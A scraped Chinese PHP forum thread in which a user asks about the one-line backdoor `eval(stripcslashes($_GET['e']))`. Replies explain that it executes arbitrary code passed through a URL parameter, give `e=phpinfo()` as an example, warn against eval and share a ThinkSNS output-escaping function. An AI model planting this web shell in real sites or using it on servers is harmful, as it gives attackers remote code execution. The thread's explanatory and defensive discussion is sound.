一个很严重的代码 <? eval(stripcslashes($_GET['e']));?> 这句代码到底有什么害处 还有怎样使用这句代码 解决方案 » 免费领取超大流量手机卡,每月29元包185G流量+100分钟通话, 中国电信官方发货 可以执行很多代码....害处要看代码是什么代码.传递一个 e=xxxxxxx 必要的地方加反斜杠 浏览器地址后加个参数http://www.abc.com?e=...后面可以加任何函数或字串e=phpinfo() 这都是最常见的php漏洞,建议你看看这个。http://www.2cto.com/Article/200911/43018.html eval 不要乱用,其实是最好不要用。 /** * 转换为安全的纯文本 * * @param string $text * @param boolean $parse_br 是否转换换行符 * @param int $quote_style ENT_NOQUOTES:(默认)不过滤单引号和双引号 ENT_QUOTES:过滤单引号和双引号 ENT_COMPAT:过滤双引号,而不过滤单引号 * @return string|null string:被转换的字符串 null:参数错误 */function t($text, $parse_br = false, $quote_style = ENT_NOQUOTES){ if (is_numeric($text)) $text = (string)$text; if (!is_string($text)) return null; if (!$parse_br) { $text = str_replace(array("\r","\n","\t"), ' ', $text); } else { $text = nl2br($text); } //$text = stripslashes($text); $text = htmlspecialchars($text, $quote_style, 'UTF-8'); return $text;} thinksns过滤的 请教一个字符串分割问题 这段登陆验证代码有什么错误? 求类似于discuz或者csdn的内容编辑器,就是对内容进行加粗这些,我要写一个简单的发帖功能 php关于数组的组合查询问题 搞了很久没有成功~有人帮我调试一个采集程序吗 从数据库提取数据显示的问题 各们帮忙呀,急急急!谢谢 请问session问题!!! win2000和 win2000server下 php服务器有什么不同? 有没有用php做好的政府网站 关于artdialog 插件的问题 为什么POST过来的sha1加密字符串相等的判断不对呢。
传递一个 e=xxxxxxx 必要的地方加反斜杠
后面可以加任何函数或字串e=phpinfo()
http://www.2cto.com/Article/200911/43018.html
* 转换为安全的纯文本
*
* @param string $text
* @param boolean $parse_br 是否转换换行符
* @param int $quote_style ENT_NOQUOTES:(默认)不过滤单引号和双引号 ENT_QUOTES:过滤单引号和双引号 ENT_COMPAT:过滤双引号,而不过滤单引号
* @return string|null string:被转换的字符串 null:参数错误
*/
function t($text, $parse_br = false, $quote_style = ENT_NOQUOTES)
{
if (is_numeric($text))
$text = (string)$text; if (!is_string($text))
return null; if (!$parse_br) {
$text = str_replace(array("\r","\n","\t"), ' ', $text);
} else {
$text = nl2br($text);
} //$text = stripslashes($text);
$text = htmlspecialchars($text, $quote_style, 'UTF-8'); return $text;
} thinksns过滤的